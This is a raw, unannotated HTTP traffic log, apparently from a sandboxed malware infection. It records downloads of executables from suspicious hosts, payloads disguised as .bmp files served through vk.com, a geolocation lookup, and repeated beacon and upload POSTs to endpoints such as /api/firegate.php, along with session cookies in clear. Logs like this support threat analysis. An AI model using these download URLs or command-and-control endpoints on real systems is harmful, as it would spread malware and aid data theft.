HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site X-Frame-Options: SAMEORIGIN Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 27 Oct 2023 03:15:50 GMT Content-Security-Policy: script-src 'unsafe-eval';require-trusted-types-for 'script';object-src 'none' Strict-Transport-Security: max-age=31536000; includeSubDomains Report-To: {"group":"AccountsSignInSignUpUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInSignUpUi"}]} Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInSignUpUi" Cross-Origin-Resource-Policy: same-site Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=* Content-Encoding: gzip Server: ESF X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Transfer-Encoding: chunked

GET /favicon.ico HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: accounts.google.com Connection: Keep-Alive Cookie: __Host-GAPS=1:w3yoiD0OM6wAuiZE7oF1_sFTROmb:0cGnX7jTYpmM9EwD

HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 X-Frame-Options: DENY Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 27 Oct 2023 03:15:52 GMT Location: https://www.google.com/favicon.ico Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport Content-Security-Policy: script-src 'nonce-x-84vvdjwXsIwtLw8XhNCg' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]} Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk" Content-Encoding: gzip X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Transfer-Encoding: chunked

GET /generate_204?YDaA_g HTTP/1.1 Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5 Referer: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyzdzet-5bFdLPdUq1j1uDurwe6kz_lHlw7J7WHjbFlxuWq7DWllN0DrN9yErviFid87F_Tyrw&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-1207139751%3A1698376547583620 Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: accounts.google.com Connection: Keep-Alive Cookie: __Host-GAPS=1:w3yoiD0OM6wAuiZE7oF1_sFTROmb:0cGnX7jTYpmM9EwD

HTTP/1.1 204 No Content Content-Length: 0 Cross-Origin-Resource-Policy: cross-origin Date: Fri, 27 Oct 2023 03:15:52 GMT Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

GET /favicon.ico HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Accept-Ranges: bytes Content-Encoding: gzip Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 1494 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Fri, 27 Oct 2023 01:16:37 GMT Expires: Sat, 04 Nov 2023 01:16:37 GMT Cache-Control: public, max-age=691200 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT Content-Type: image/x-icon Vary: Accept-Encoding Age: 7156 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

GET /setup294.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: experiment.pw Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:54 GMT Content-Type: application/x-msdos-program Content-Length: 2591936 Connection: keep-alive Last-Modified: Fri, 27 Oct 2023 01:58:03 GMT ETag: "278cc0-608a904c860c0" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 2550 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G1mrNVndEWYIBwDExnQP%2FeGxlV%2BkqK%2BnMiD5aRJFlgwk5S2bSX9P02%2BivSa3cAPyAyM2lyo3RvPysgxQNhRuIF6OJj6svmKOvFeCemT4ApU%2BCR1kbuKlf3i8ncee0QsB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81c7c6fb2c24102c-LAX alt-svc: h3=":443"; ma=86400

GET /7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: octocrabs.com Cache-Control: no-cache

GET /doc52355237_667323207?hash=ZkIwTTYNTwNDXLt5Gs5EEchtp6n7cf7VmKRYfvfVcZc&dl=ZTGusJZiietYLrS13VtWmnhjrFLGcXrZJST1wXSwTtP&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9113008033764787759_hVgcSPifUsIAAhjNAi9wC8MHc1fHmRDZvzbAsjZtclH; remixlgck=f6a3c558ea2f3e8ecb; remixstid=498352845_tnsKosZA8o4nBezzZmzDrQyX8Co48jS2wjFEH5dl5iH

HTTP/1.1 302 Found Server: kittenx Date: Fri, 27 Oct 2023 03:15:56 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114888 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c909518/u52355237/docs/d59/1bb094138bd6/d432j89adg.bmp?extra=uZ0kz3xyyLQRpHyiIUVDgzVuc8ISnjGwzHU3Zj5l6-kOEBCA2aVwbMUmknHcD5WrU8GfP7b98J-VdksDqOUosQfPqiGhAbCxWrH-Idsh_1XZ-Z0T00Y9APKnURqnh4Q2r8vMm2YUqVDohxSj X-Frontend: front605108 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /8b54e3f23ea4df83b44da9add06c973d/7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Connection: Keep-Alive Cache-Control: no-cache Host: neuralshit.net

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:57 GMT Content-Type: application/x-ms-dos-executable Content-Length: 4273528 Connection: keep-alive Last-Modified: Thu, 26 Oct 2023 23:25:22 GMT Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aY39FuIGx7T7fYf5NRD%2BF158zeN4m6Znykf5ghSJoyLEtt%2Bd6GLJFj4aSgUPAtR%2FSr1pOAo4ismcnKvg65WM23fH4iAuPi4%2FSc1MmbY%2B8TUO4yLmlzVyxQyUkXoAY60wxw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81c7c70b7f3e7c01-LAX alt-svc: h3=":443"; ma=86400

GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:58 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZcJ0aYsH3SLuXICvN%2B74vBk2RDb%2FgE9rVJNHRGaPOP3bZpv03Ykks%2B3iArUYKtxVhNPyS%2B0w%2F83r%2BfKw9Xcmn5K0vUTTaIfRVctkY%2B%2FNzjQXITJSJQcmKaZTfJ6P"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81c7c70d48bd7cd1-LAX alt-svc: h3=":443"; ma=86400

GET /doc825067038_675094078?hash=yy528d2cdSWh8Qb1vjKZzrbg9uO0tUhBgbnW8xFFc7g&dl=fzvSk2lE8vQ96mfYErqNUoJZiKQg6dRgeIDz0UiA5W8&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9113008033764787759_hVgcSPifUsIAAhjNAi9wC8MHc1fHmRDZvzbAsjZtclH; remixlgck=f6a3c558ea2f3e8ecb; remixstid=498352845_tnsKosZA8o4nBezzZmzDrQyX8Co48jS2wjFEH5dl5iH

HTTP/1.1 302 Found Server: kittenx Date: Fri, 27 Oct 2023 03:15:58 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114888 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c237331/u825067038/docs/d49/2fa5bb09a502/PL_Client.bmp?extra=hoE_PGrrkY5d2NqippbG-UTIRwu_h48s7-Mi86qburxYxYP2a4nfRxp8kaKBiRxuro79vWtZxNk0QuVAV280jjii1nd_0ovq3qK0e2f0q64HOWQQ6l8DT724JVMNbiPaXVLRXVti3oXOXSvj6A X-Frontend: front605108 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909518/u52355237/docs/d59/1bb094138bd6/d432j89adg.bmp?extra=uZ0kz3xyyLQRpHyiIUVDgzVuc8ISnjGwzHU3Zj5l6-kOEBCA2aVwbMUmknHcD5WrU8GfP7b98J-VdksDqOUosQfPqiGhAbCxWrH-Idsh_1XZ-Z0T00Y9APKnURqnh4Q2r8vMm2YUqVDohxSj HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 27 Oct 2023 03:15:58 GMT Content-Type: image/x-ms-bmp Content-Length: 351236 Connection: keep-alive Last-Modified: Mon, 23 Oct 2023 17:30:31 GMT ETag: "6536adb7-55c04" Expires: Sun, 26 Nov 2023 03:15:58 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /c237331/u825067038/docs/d49/2fa5bb09a502/PL_Client.bmp?extra=hoE_PGrrkY5d2NqippbG-UTIRwu_h48s7-Mi86qburxYxYP2a4nfRxp8kaKBiRxuro79vWtZxNk0QuVAV280jjii1nd_0ovq3qK0e2f0q64HOWQQ6l8DT724JVMNbiPaXVLRXVti3oXOXSvj6A HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 27 Oct 2023 03:15:59 GMT Content-Type: image/x-ms-bmp Content-Length: 3685892 Connection: keep-alive Last-Modified: Thu, 26 Oct 2023 06:43:31 GMT ETag: "653a0a93-383e04" Expires: Sun, 26 Nov 2023 03:15:59 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc825067038_675107888?hash=p1edxhMap9ebzzyYu0bwG8SRx7fNg9lc730omI4QiGL&dl=7VNr97gwpMxX5zCHlKbDwt20Nh6MmLxWO6FX8g4zAqL&api=1&no_preview=1#s6 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9113008033764787759_hVgcSPifUsIAAhjNAi9wC8MHc1fHmRDZvzbAsjZtclH; remixlgck=f6a3c558ea2f3e8ecb; remixstid=498352845_tnsKosZA8o4nBezzZmzDrQyX8Co48jS2wjFEH5dl5iH; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Fri, 27 Oct 2023 03:15:59 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114888 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c909618/u825067038/docs/d56/53e217f03c63/s6d7rtfygiftu57e8r6tfjgcfxdsreturyit.bmp?extra=iGkHoDjsILLIjBMdJJUo6FgOpO-KtPGICJdjT4FoefBp4bB2jgAGKbjdQXtnA_ThsSCU5i5bS3Lg6d6Y6Wf4CrjFyErGfuQ_v5XoImwRYBfYh-JyYGa34C7_VJ6Qs-x-Dt8GVlJ3J5XGCr-W3w X-Frontend: front605108 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc825067038_675096729?hash=qSZS9aM0ivWNtijm1zaWyzA7J0bEJfI7RF562vpg2qP&dl=Di89rUJwazaYzfGe5B8jQKQ6f8sDEfxK1AwIneVf478&api=1&no_preview=1#redcl HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9113008033764787759_hVgcSPifUsIAAhjNAi9wC8MHc1fHmRDZvzbAsjZtclH; remixlgck=f6a3c558ea2f3e8ecb; remixstid=498352845_tnsKosZA8o4nBezzZmzDrQyX8Co48jS2wjFEH5dl5iH; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Fri, 27 Oct 2023 03:15:59 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114888 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-22.userapi.com/c909328/u825067038/docs/d10/fd086603287f/red.bmp?extra=zYTCTjDurMXD3dgkI5bHy3cXnZBNncN4I8n51Y9hk8bLzF3Dv1aePJ8XfT539FOwfZjMjTIKqvS07bnzor215dPE1aiIH1IuV444DOz8_yaiOt5TK6-4XGc9sUBOTdmW7tFv7qTLjhBAWTg-TQ X-Frontend: front605108 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909618/u825067038/docs/d56/53e217f03c63/s6d7rtfygiftu57e8r6tfjgcfxdsreturyit.bmp?extra=iGkHoDjsILLIjBMdJJUo6FgOpO-KtPGICJdjT4FoefBp4bB2jgAGKbjdQXtnA_ThsSCU5i5bS3Lg6d6Y6Wf4CrjFyErGfuQ_v5XoImwRYBfYh-JyYGa34C7_VJ6Qs-x-Dt8GVlJ3J5XGCr-W3w HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 27 Oct 2023 03:15:59 GMT Content-Type: image/x-ms-bmp Content-Length: 2969332 Connection: keep-alive Last-Modified: Thu, 26 Oct 2023 12:44:16 GMT ETag: "653a5f20-2d4ef4" Expires: Sun, 26 Nov 2023 03:15:59 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /c909328/u825067038/docs/d10/fd086603287f/red.bmp?extra=zYTCTjDurMXD3dgkI5bHy3cXnZBNncN4I8n51Y9hk8bLzF3Dv1aePJ8XfT539FOwfZjMjTIKqvS07bnzor215dPE1aiIH1IuV444DOz8_yaiOt5TK6-4XGc9sUBOTdmW7tFv7qTLjhBAWTg-TQ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-22.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 27 Oct 2023 03:16:00 GMT Content-Type: image/x-ms-bmp Content-Length: 226820 Connection: keep-alive Last-Modified: Thu, 26 Oct 2023 08:05:19 GMT ETag: "653a1dbf-37604" Expires: Sun, 26 Nov 2023 03:16:00 GMT Cache-Control: max-age=2592000 X-Frontend: front6-22 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 193.42.32.118

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:14:25 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 193.42.32.118

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:14:26 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 193.42.32.118

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:14:32 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 4160 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /download/Services.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.226 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:14:33 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 29 Sep 2023 10:22:21 GMT ETag: "3fde00-6067cccc77333" Accept-Ranges: bytes Content-Length: 4185600 Content-Type: application/x-msdos-program

HEAD /race/bus50.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 109.107.182.2 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:14:33 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 27 Oct 2023 03:12:20 GMT ETag: "185a00-608aa0e7bdbc8" Accept-Ranges: bytes Content-Length: 1595904 Content-Type: application/x-msdos-program

HEAD /timeSync.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: roberthamilton.top Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:14:34 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 27 Oct 2023 03:00:02 GMT ETag: "2d400-608a9e275e8a8" Accept-Ranges: bytes Content-Length: 185344 Connection: close Content-Type: application/x-msdos-program

GET /download/Services.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.226 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:14:33 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 29 Sep 2023 10:22:21 GMT ETag: "3fde00-6067cccc77333" Accept-Ranges: bytes Content-Length: 4185600 Content-Type: application/x-msdos-program

GET /race/bus50.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 109.107.182.2 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:14:34 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 27 Oct 2023 03:12:20 GMT ETag: "185a00-608aa0e7bdbc8" Accept-Ranges: bytes Content-Length: 1595904 Content-Type: application/x-msdos-program

GET /timeSync.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: roberthamilton.top Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:14:35 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 27 Oct 2023 03:00:02 GMT ETag: "2d400-608a9e275e8a8" Accept-Ranges: bytes Content-Length: 185344 Connection: close Content-Type: application/x-msdos-program

GET /4.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 176.113.115.84:8080 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:14:34 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Transfer-Encoding: Binary Content-disposition: attachment; filename="65zdsy4a19.exe" Transfer-Encoding: chunked Content-Type: application/octet-stream

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 477 Host: 193.42.32.118

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:14:57 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 94.142.138.113

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:14:58 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:14:58 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 193.42.32.118

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:03 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 21445 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:24 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /e9c345fc99a4e67e.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJKJEHJKJEBGHJJKEBGI Host: howardwood.top Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Connection: close Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:26 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive Host: 193.42.32.118

